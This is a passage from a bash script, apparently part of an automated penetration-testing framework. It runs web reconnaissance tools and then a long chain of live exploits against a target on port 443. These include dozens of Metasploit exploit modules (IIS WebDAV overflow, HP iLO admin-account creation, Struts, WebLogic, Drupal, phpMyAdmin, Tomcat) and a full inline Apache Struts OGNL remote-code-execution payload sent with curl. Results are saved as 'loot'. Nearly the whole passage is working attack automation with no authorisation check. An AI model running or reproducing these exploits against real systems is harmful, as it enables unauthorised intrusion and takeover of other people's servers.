python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_FULL -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,jsp,pl,cgi,js,css,txt,html,htm
fi
if [ "$WEB_BRUTE_EXPLOITSCAN" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE FOR VULNERABILITIES $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_EXPLOITS -x 400,403,404,405,406,429,502,503,504 -F -e html
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET:$PORT -w $WEB_BRUTE_INSANE -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,bak,zip,tar.gz,html,htm
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
wget https://$TARGET:$PORT/robots.txt -O $LOOT_DIR/web/robots-$TARGET:$PORT-https.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING NMAP HTTP SCRIPTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nmap -A -sV -T5 -Pn -p 443 --script=/usr/share/nmap/scripts/iis-buffer-overflow.nse --script=http-vuln* $TARGET
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
clusterd --ssl -i $TARGET 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
wpscan --url https://$TARGET --disable-tls-checks
echo ""
wpscan --url https://$TARGET/wordpress/ --disable-tls-checks
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING CMSMAP $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
cmsmap https://$TARGET
echo ""
cmsmap https://$TARGET/wordpress/
echo ""
wget https://$TARGET/robots.txt -O $LOOT_DIR/web/robots-$TARGET-https.txt 2> /dev/null
if [ "$NMAP_SCRIPTS" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING NMAP HTTP SCRIPTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nmap -A -sV -T5 -Pn -p 443 --script=/usr/share/nmap/scripts/iis-buffer-overflow.nse --script=http-vuln* $TARGET | tee $LOOT_DIR/output/nmap-$TARGET-port443
sed -r "s/</\&lh\;/g" $LOOT_DIR/output/nmap-$TARGET-port443 2> /dev/null > $LOOT_DIR/output/nmap-$TARGET-port443.txt 2> /dev/null
rm -f $LOOT_DIR/output/nmap-$TARGET-port443 2> /dev/null
fi
if [ "$CLUSTERD" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
clusterd --ssl -i $TARGET 2> /dev/null | tee $LOOT_DIR/web/clusterd-$TARGET-https.txt
fi
if [ "$CMSMAP" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING CMSMAP $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
cmsmap https://$TARGET | tee $LOOT_DIR/web/cmsmap-$TARGET-httpsa.txt
echo ""
cmsmap https://$TARGET/wordpress/ | tee $LOOT_DIR/web/cmsmap-$TARGET-httpsb.txt
echo ""
fi
if [ "$WPSCAN" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
wpscan --url https://$TARGET --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/cmsmap-$TARGET-httpsa.txt
echo ""
wpscan --url https://$TARGET/wordpress/ --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/cmsmap-$TARGET-httpsb.txt
fi
if [ "$NIKTO" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WEB VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nikto -h https://$TARGET -output $LOOT_DIR/web/nikto-$TARGET-https.txt
fi
if [ "$SHOCKER" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING SHELLSHOCK EXPLOIT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --ssl --port 443 | tee $LOOT_DIR/web/shocker-$TARGET-port443.txt
fi
if [ "$JEXBOSS" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING JEXBOSS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
cd /tmp/
python /usr/share/sniper/plugins/jexboss/jexboss.py -u https://$TARGET | tee $LOOT_DIR/web/jexboss-$TARGET-port443.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/jexboss-$TARGET-port443.raw > $LOOT_DIR/web/jexboss-$TARGET-port443.txt 2> /dev/null
rm -f $LOOT_DIR/web/jexboss-$TARGET-port443.raw 2> /dev/null
cd $INSTALL_DIR
fi
cd $INSTALL_DIR
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING HTTP PUT UPLOAD SCANNER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use scanner/http/http_put; setg RHOSTS "$TARGET"; setg RPORT "443"; setg SSL true; run; set PATH /uploads/; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "443"; setg SSL true; run; use scanner/http/webdav_website_content; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING MICROSOFT IIS WEBDAV ScStoragePathFromUrl OVERFLOW $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/windows/iis/iis_webdav_scstoragepathfromurl; setg RHOST "$TARGET"; setg RPORT "443"; setg SSL true; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE TOMCAT UTF8 TRAVERSAL EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use admin/http/tomcat_utf8_traversal; setg RHOSTS "$TARGET"; setg RPORT "443"; set SSL true; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "443"; set SSL true; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING MS15-034 SYS MEMORY DUMP METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use auxiliary/scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS \"$TARGET\"; set RPORT 443; set SSL true; set WAIT 2; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/windows/http/badblue_passthru; setg RHOST \"$TARGET\"; set RPORT 443; set SSL true; run; back;exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST \"$TARGET\"; set RPORT 443; set SSL true; run; back;exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST \"$TARGET\"; set RPORT 443; set SSL true; run; back;exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 443; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING SHELLSHOCK EXPLOIT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --port 443 --ssl
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE STRUTS 2 CVE-2017-5638 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $INSTALL_DIR/bin/apache_struts_cve-2017-5638.py -u https://$TARGET
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE STRUTS 2 CVE-2017-9805 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $INSTALL_DIR/bin/apache_struts_cve-2017-9805.py -u https://$TARGET
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE JAKARTA RCE EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
curl -s -H "Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" https://$TARGET | head -n 1
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE STRUTS 2 CVE-2018-11776 RCE EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $INSTALL_DIR/bin/apache-struts-CVE-2018-11776.py -u https://$TARGET
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING DRUPALGEDDON2 CVE-2018-7600 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
ruby $INSTALL_DIR/bin/drupalgeddon2.rb https://$TARGET
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING CISCO ASA TRAVERSAL CVE-2018-0296 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $INSTALL_DIR/bin/cisco-asa-traversal.py https://$TARGET:$PORT
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING JEXBOSS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
cd /tmp/
python /usr/share/sniper/plugins/jexboss/jexboss.py -u https://$TARGET
cd $INSTALL_DIR
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING GPON ROUTER EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $INSTALL_DIR/bin/gpon_rce.py https://$TARGET:$PORT 'whoami'
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE TOMCAT CVE-2017-12617 RCE EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $INSTALL_DIR/bin/tomcat-cve-2017-12617.py -u https://$TARGET
fi
if [ "$METASPLOIT_EXPLOIT" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING HTTP PUT UPLOAD SCANNER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use scanner/http/http_put; setg RHOSTS "$TARGET"; setg RPORT "443"; set SSL true; setg SSL false; run; set PATH /uploads/; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-http_put.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-http_put.raw > $LOOT_DIR/output/msf-$TARGET-port443-http_put.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port443-http_put.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "443"; set SSL true; setg SSL false; run; use scanner/http/webdav_website_content; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-webdav_website_content.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-webdav_website_content.raw > $LOOT_DIR/output/msf-$TARGET-port443-webdav_website_content.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port443-webdav_website_content.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING MICROSOFT IIS WEBDAV ScStoragePathFromUrl OVERFLOW $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/windows/iis/iis_webdav_scstoragepathfromurl; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; setg SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-iis_webdav_scstoragepathfromurl.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-iis_webdav_scstoragepathfromurl.raw > $LOOT_DIR/output/msf-$TARGET-port443-iis_webdav_scstoragepathfromurl.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port443-iis_webdav_scstoragepathfromurl.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE TOMCAT UTF8 TRAVERSAL EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use admin/http/tomcat_utf8_traversal; setg RHOSTS "$TARGET"; setg RPORT "443"; set SSL true; set SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-tomcat_utf8_traversal.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-tomcat_utf8_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port443-tomcat_utf8_traversal.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port443-tomcat_utf8_traversal.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "443"; set SSL true; set SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-apache_optionsbleed.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-apache_optionsbleed.raw > $LOOT_DIR/output/msf-$TARGET-port443-apache_optionsbleed.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port443-apache_optionsbleed.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; set SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET--port80-hp_ilo_create_admin_account.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET--port80-hp_ilo_create_admin_account.raw > $LOOT_DIR/output/msf-$TARGET--port80-hp_ilo_create_admin_account.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET--port80-hp_ilo_create_admin_account.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING DRUPALGEDDON HTTP PARAMETER SQL INJECTION CVE-2014-3704 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/multi/http/drupal_drupageddon; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-drupal_drupageddon.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-drupal_drupageddon.raw > $LOOT_DIR/output/msf-$TARGET-port443-drupal_drupageddon.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port443-drupal_drupageddon.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING MS15-034 SYS MEMORY DUMP METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use auxiliary/scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set WAIT 2; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-ms15_034_http_sys_memory_dump.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-ms15_034_http_sys_memory_dump.raw > $LOOT_DIR/output/msf-$TARGET-port443-ms15_034_http_sys_memory_dump.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port443-ms15_034_http_sys_memory_dump.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/windows/http/badblue_passthru; setg RHOST "$TARGET"; set RPORT 80; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET--port80-badblue_passthru.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET--port80-badblue_passthru.raw > $LOOT_DIR/output/msf-$TARGET--port80-badblue_passthru.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET--port80-badblue_passthru.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST "$TARGET"; set RPORT 80; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-php_cgi_arg_injection.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-php_cgi_arg_injection.raw > $LOOT_DIR/output/msf-$TARGET-port443-php_cgi_arg_injection.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port443-php_cgi_arg_injection.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOITS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/htp/phpmyadmin_preg_replace; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-phpmyadmin_3522_backdoor.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-phpmyadmin_3522_backdoor.raw > $LOOT_DIR/output/msf-$TARGET-port443-phpmyadmin_3522_backdoor.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port443-phpmyadmin_3522_backdoor.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT CVE-2017-8917 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST "$TARGET"; set RPORT 80; set SSL false; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-joomla_comfields_sqli_rce.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-joomla_comfields_sqli_rce.raw > $LOOT_DIR/output/msf-$TARGET-port443-joomla_comfields_sqli_rce.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port443-joomla_comfields_sqli_rce.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WORDPRESS REST API CONTENT INJECTION CVE-2017-5612 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use auxiliary/scanner/http/wordpress_content_injection; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT 80; set SSL false; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-wordpress_content_injection.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-wordpress_content_injection.raw > $LOOT_DIR/output/msf-$TARGET-port443-wordpress_content_injection.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port443-wordpress_content_injection.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING ORACLE WEBLOGIC WLS-WSAT DESERIALIZATION RCE CVE-2017-10271 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/multi/http/oracle_weblogic_wsat_deserialization_rce; setg RHOST "$TARGET"; set RPORT 80; set SSL false; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-oracle_weblogic_wsat_deserialization_rce.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-oracle_weblogic_wsat_deserialization_rce.raw > $LOOT_DIR/output/msf-$TARGET-port443-oracle_weblogic_wsat_deserialization_rce.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port443-oracle_weblogic_wsat_deserialization_rce.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE STRUTS JAKARTA OGNL INJECTION CVE-2017-5638 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use multi/http/struts2_content_type_ognl; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-struts2_content_type_ognl.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-struts2_content_type_ognl.raw > $LOOT_DIR/output/msf-$TARGET-port443-struts2_content_type_ognl.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port443-struts2_content_type_ognl.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE STRUTS 2 SHOWCASE OGNL RCE CVE-2017-9805 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/multi/http/struts2_rest_xstream; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-struts2_rest_xstream.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-struts2_rest_xstream.raw > $LOOT_DIR/output/msf-$TARGET-port443-struts2_rest_xstream.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port443-struts2_rest_xstream.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE STRUTS 2 REST XSTREAM RCE CVE-2017-9791 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/multi/http/struts2_code_exec_showcase; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-struts2_code_exec_showcase.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-struts2_code_exec_showcase.raw > $LOOT_DIR/output/msf-$TARGET-port443-struts2_code_exec_showcase.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port443-struts2_code_exec_showcase.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE TOMCAT CVE-2017-12617 RCE EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/multi/http/tomcat_jsp_upload_bypass; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-tomcat_jsp_upload_bypass.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-tomcat_jsp_upload_bypass.raw > $LOOT_DIR/output/msf-$TARGET-port443-tomcat_jsp_upload_bypass.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port443-tomcat_jsp_upload_bypass.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE STRUTS 2 NAMESPACE REDIRECT OGNL INJECTION CVE-2018-11776 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/multi/http/struts2_namespace_ognl; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-struts2_namespace_ognl.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-struts2_namespace_ognl.raw > $LOOT_DIR/output/msf-$TARGET-port443-struts2_namespace_ognl.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port443-struts2_namespace_ognl.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED CISCO ASA TRAVERSAL CVE-2018-0296 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use auxiliary/scanner/http/cisco_directory_traversal; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-cisco_directory_traversal.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-cisco_directory_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port443-cisco_directory_traversal.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port443-cisco_directory_traversal.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING DRUPALGEDDON2 CVE-2018-7600 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
